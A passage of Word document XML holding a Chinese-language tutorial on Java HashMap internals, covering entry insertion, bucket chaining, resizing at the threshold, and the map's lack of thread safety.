            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>如果</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> Map </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> key-value </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>对的数量超过了极限</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>    if (size++ &gt;= threshold)   </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>        // </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>把</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> table </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>对象的长度扩充到</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t> 2 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>倍。</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>10.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>        resize(2 * table.length);    // </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>②</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="007666CD" w:rsidP="007666CD">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="315" w:lineRule="atLeast"/>
              <w:ind w:left="810" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>11.</w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F41A4C">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="3D3D3D"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D2346B" w:rsidRPr="00F41A4C" w:rsidRDefault="00D2346B" w:rsidP="00D2346B">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:before="136" w:after="136"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007666CD" w:rsidRPr="00F41A4C" w:rsidRDefault="00D2346B" w:rsidP="002D421F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上面方法的代码很简单，但其中包含了一个非常优雅的设计：系统总是将新添加的</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Entry </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象放入</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> table </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数组的</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> bucketIndex </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引处</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> bucketIndex </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引处已经有了一个</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Entry </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象，那新添加的</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Entry </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象指向原有的</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Entry </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象（产生一个</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Entry </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>链），如果</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> bucketIndex </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>索引处没有</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Entry </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象，也就是上面程序</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>号代码的</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> e </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>变量是</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> null</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，也就是新放入的</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Entry </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象指向</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> null</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，也就是没有产生</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Entry </w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>链。</w:t>
      </w:r>
      <w:r w:rsidR="002D421F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D2346B" w:rsidRPr="00F41A4C" w:rsidRDefault="00D2346B" w:rsidP="002D421F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="136" w:after="136"/>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 xml:space="preserve">　　好了，到这里位置，整个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的擦入元素的过程就已经看的很清楚了，在整个这个过程中没有看到有加锁的过程，因此可以说明</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是不支持并发的，不是线程安全的，在并发的环境下使用会产生一些不一致的问题。。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C20">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E3C20" w:rsidRPr="00F41A4C" w:rsidRDefault="002E3C20" w:rsidP="002E3C20">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
